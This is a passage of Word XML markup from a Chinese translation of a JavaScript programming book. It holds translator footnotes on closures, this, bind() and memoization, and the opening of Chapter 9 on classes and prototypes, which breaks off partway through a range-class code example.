      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>这个术语非常古老，是指函数变量可以被隐藏于作用域链之内，因此看起来是函数将变量</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包裹</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>了起来。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>之所以有这种想法是因为很多人以为函数执行结束后，与之相关的作用域链似乎也不存在了，但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中并非如此。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r>
        <w:t>作者在这里清楚地解释了闭包和垃圾回收之间的关系，如果使用不慎，闭包很容易造成</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>循环引用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，当</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对象之间存在循环引用时需要格</w:t>
      </w:r>
      <w:r>
        <w:t>外小心，在某些浏览器下会造成内存泄漏。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:r>
        <w:t>严格讲，闭包内的逻辑是可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的，但这个</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>和当初定义函数时的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>不是同一个，即便是同一个</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值是随着调用栈的变化而变化的，而闭包里的逻辑所取到的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值也是不确定的，因此外部函数内的闭包是可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的，但要非常小心地使用才行，作者在这里提到的将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>转存为一个变量的做法就可以避免</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的不确定性带来的歧义。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r>
        <w:t>泛函数也叫泛函，在这里特指一种变换，以函数为输入，输出可以是值也可以是另一个函数，泛函的概念可</w:t>
      </w:r>
      <w:r>
        <w:t>以参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://zh.wikipedia.org/wiki/</w:t>
      </w:r>
      <w:r>
        <w:t>泛函数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:r>
        <w:t>作者的意思是在运行时将</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>所返回的函数用做构造函数时，所传入实参会原封不动的传入原始函数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:r>
        <w:t>也就是全局作用域。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r>
        <w:t>作者给出的这个例子有误，应当是</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r>
        <w:t>如果你对这部分内容感兴趣，推荐你使用一下（至少阅读一下）奥利弗</w:t>
      </w:r>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>斯蒂尔（</w:t>
      </w:r>
      <w:r>
        <w:t>Oliver Steele</w:t>
      </w:r>
      <w:r>
        <w:t>）的函数式</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库，请参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://osteele.com/sources/javascri</w:t>
      </w:r>
      <w:r>
        <w:t>pt/functional/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r>
        <w:t>作者在本节讨论的是一种函数变换技巧，即把一次完整的函数调用拆成多次函数调用，每次传入的实参都是完整实参的一部分，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>每个拆分开的函数叫做不完全函数（</w:t>
      </w:r>
      <w:r>
        <w:t>partial function</w:t>
      </w:r>
      <w:r>
        <w:t>），每次函数调用叫做不完全调用（</w:t>
      </w:r>
      <w:r>
        <w:t>partial application</w:t>
      </w:r>
      <w:r>
        <w:t>），这种函数变换的特点是每次调用都返回一个函数，直到得到最终运行结果为止，举一个简单的例子，将对函数</w:t>
      </w:r>
      <w:r>
        <w:t>f(1,2,3,4,5,6)</w:t>
      </w:r>
      <w:r>
        <w:t>的调用修改为等价的</w:t>
      </w:r>
      <w:r>
        <w:t>f(1,2)(3,4)(5,6)</w:t>
      </w:r>
      <w:r>
        <w:t>，后者包含三次调用，和每次调用相关的函数就是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不完全函数</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_20_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
      <w:r>
        <w:t>需要注意的是，记忆只是一种编程技巧，本质上是牺牲算法的空间复杂度以换取更优的时间复杂度，在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中代码的执行时间复杂度往往成为瓶颈，因此在大多数场景下，这种牺牲空间换取时间的做法以提升程序执行效率的做法是非常可取的。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="Di_9Zhang__Lei_He_Mo_Kuai_____Di_6Zhang_"/>
      <w:bookmarkStart w:id="223" w:name="Di_9Zhang__Lei_He_Mo_Kuai_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章　类和模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章详细介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，每个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象都是一个属性集合，相互之间没有任何联系。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中也可以定义对象的类，让每个对象都共享某些属性，这种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>共享</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的特性是非常有用的。类的成员或实例都</w:t>
      </w:r>
      <w:r>
        <w:t>包含一些属性，用以存放或定义它们的状态，其中有些属性定义了它们的行为（通常称为方法）。这些行为通常是由类定义的，而且为所有实例所共享。例如，假设有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>的类用来表示复数，同时还定义了一些复数运算。一个</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>实例应当包含复数的实部和虚部（状态），同样</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类还会定义复数的加法和乘法操作（行为）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，类的实现是基于其原型继承机制的。如果两个实例都从同一个原型对象上继承了属性，我们说它们是同一个类的实例。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>原型和继承在</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>节中有详细讨论，为了更好地理解本章的内容，请务必首先阅读这两个章节。本章将会在</w:t>
      </w:r>
      <w:r>
        <w:t>9.1</w:t>
      </w:r>
      <w:r>
        <w:t>节中对原型做进一步讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果两个对象继承自同一个原型，往往意味着（但不是绝对）它们是由同一个构造函数创建并初始化的。我们已经在</w:t>
      </w:r>
      <w:r>
        <w:t>4.6</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节中详细讲解了构造函数，</w:t>
      </w:r>
      <w:r>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会有进一步讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果你对诸如</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>这种强类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>的面向对象编程比较熟悉，你会发现</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的类和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>中的类有很大不同。尽管在写法上类似，而且在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中也能</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>出很多经典的类的特性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>，但是最好要理解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的类和基于原型的继承机制，以及和传统的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>（当然还有类似</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的语言）的类和基于类的继承机制的不同之处。</w:t>
      </w:r>
      <w:r>
        <w:t>9.3</w:t>
      </w:r>
      <w:r>
        <w:t>节展示了如何在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中实现经典的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中类的一个重要特性是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>动态可继承</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>dynamically extendable</w:t>
      </w:r>
      <w:r>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:t>9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节详细解释这一特性。我们可以将类看做是类型，</w:t>
      </w:r>
      <w:r>
        <w:t>9.5</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解检测对象的类的几种方式，该节同样介绍一种编程哲学</w:t>
      </w:r>
      <w:r>
        <w:t>——“</w:t>
      </w:r>
      <w:r>
        <w:t>鸭式辩型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>duck-typing</w:t>
      </w:r>
      <w:r>
        <w:t>），它弱化了对象的类型，强化了对象的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在讨论了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中所有基本的面向对象编程特性之后，我们将关注点从抽象的概念转向一些实例。</w:t>
      </w:r>
      <w:r>
        <w:t>9.6</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍两种非常重要的实现类的方法，包括很多实现面向对象的技术，这些技术可以很大程度上增强类的功能。</w:t>
      </w:r>
      <w:r>
        <w:t>9.7</w:t>
      </w:r>
      <w:r>
        <w:t>节展示（包含很多示例代码）如何实现类的继承，包括如何在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中实现类的继承。</w:t>
      </w:r>
      <w:r>
        <w:t>9.8</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的新特性来实现类以及面向对象编程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义类是模块开发和重用代码的有效方式之一，本章最后一节会集中讨论</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的模块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="9_1_Lei_He_Yuan_Xing_"/>
      <w:r>
        <w:t>9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类和原型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，类的所有实例对象都从同一个原型对象上继承属性。因此，原型对象是类的核心。在例</w:t>
      </w:r>
      <w:r>
        <w:t>6-1</w:t>
      </w:r>
      <w:r>
        <w:t>中定义了</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，这个函数返回一个新创建的对象，后者继承自某个原型对象。如果定义一个原型对象，然后通过</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数创建一个继承自它的对象，这样就定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类。通常，类的实例还需要进一步的初始化，通常是通过定义一个函数来创建并初始化这个新对象，参照例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>给一个表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>值的范围</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的类定义了原型对象，还定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>工厂</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>用以创建并初始化类的实例</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-1</w:t>
      </w:r>
      <w:r>
        <w:t>：一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//range.js:</w:t>
      </w:r>
      <w:r>
        <w:t>实现一个能表示值的范围的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个工厂方法返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function range(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>inherit()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来创建对象，这个对象继承自在下面定义的原型对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>原型对象作为函数的一个属性存储，并定义所有</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>所共享的方法（行为）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var r=inherit(range.methods);//</w:t>
      </w:r>
      <w:r>
        <w:t>存储新的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>范围对象</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>的起始位置和结束位置（状态）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这两个属性是不可继承的，每个对象都拥有唯一的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.from=from;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>r.to=to;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个新创建的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return r;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>原型对象定义方法，这些方法为每个范围对象所继承</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>range.methods={//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>在范围内，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法可以比较数字范围，也可以比较字符串和日期范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;},//</w:t>
      </w:r>
      <w:r>
        <w:t>对于范围内的每个整数都调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法只可用做数字范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>返回表示这个范围的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
